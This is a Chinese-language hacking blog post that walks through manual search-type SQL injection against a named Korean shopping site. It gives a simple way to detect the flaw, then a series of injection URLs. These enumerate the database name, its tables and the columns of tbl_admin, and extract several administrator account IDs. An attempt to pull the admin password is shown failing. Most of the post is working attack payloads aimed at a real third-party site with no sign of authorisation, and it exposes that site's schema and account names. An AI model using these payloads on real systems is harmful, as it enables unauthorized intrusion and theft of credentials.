简单判断搜索型注入漏洞存在不存在办法是先搜索'如果出错介绍说明90%存在这个漏洞然后搜索%如果正常返回介绍说明95%有洞了

然后再搜索个关键字比如2006吧正常返回所有2006相关信息再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'='存在异同话就是100%有洞了

我这里看出有上面说洞后开始用nbsi来扫结果总是超时郁闷看来要手工来暴需要信息了

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user>0 and '%'='       //得到当前数据库账号

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name>0 and '%'='       //得到当前数据库名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'='     //返回页面看来是没有admin这个表了

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'='         //得到当前数据库第个表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'='          //得到当前数据库第 2个表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpo'))>0 and '%'='           //得到当前数据库第 3个表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpo','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list','tbl_mem_add','tbl_mem_','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_','tbl_ord_payment','tbl_ord_prd','tbl_ord_prd_','tbl_ord_refund','tbl_ord_req_','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_','tbl_prd_model','tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))>0%20and%20'%'='         //依次类推得到所有表

其实分析可以知道只有这个tbl_admin表才是最重要接着开始暴列名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'='      //得到tbl_admin这个表里第个列名c_employee_id

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'='      //得到tbl_admin这个表里第 2个列名c_employee_name

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'='      //得到tbl_admin这个表里第 3个列名c_password

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'='      //得到tbl_admin这个表里第 4个列名c_level

列名暴完毕了嘿嘿接着开始暴管理员账号密码了

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'='        //得到第个管理员id为943hoon

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //得到第 2个管理员id为champ

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //得到第 3个管理员id为clark

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //得到第 4个管理员id为hskim

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //得到第 5个管理员id为jajeong

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'='        //这个语句是暴出管理员密码可惜直接返回了正常页面郁闷

会再想别办法吧


标签: 搜索型注入
图片附件缩略图:

上篇文章: 解析并防范蠕虫病毒

下篇文章: 黑客基础知识十 6问答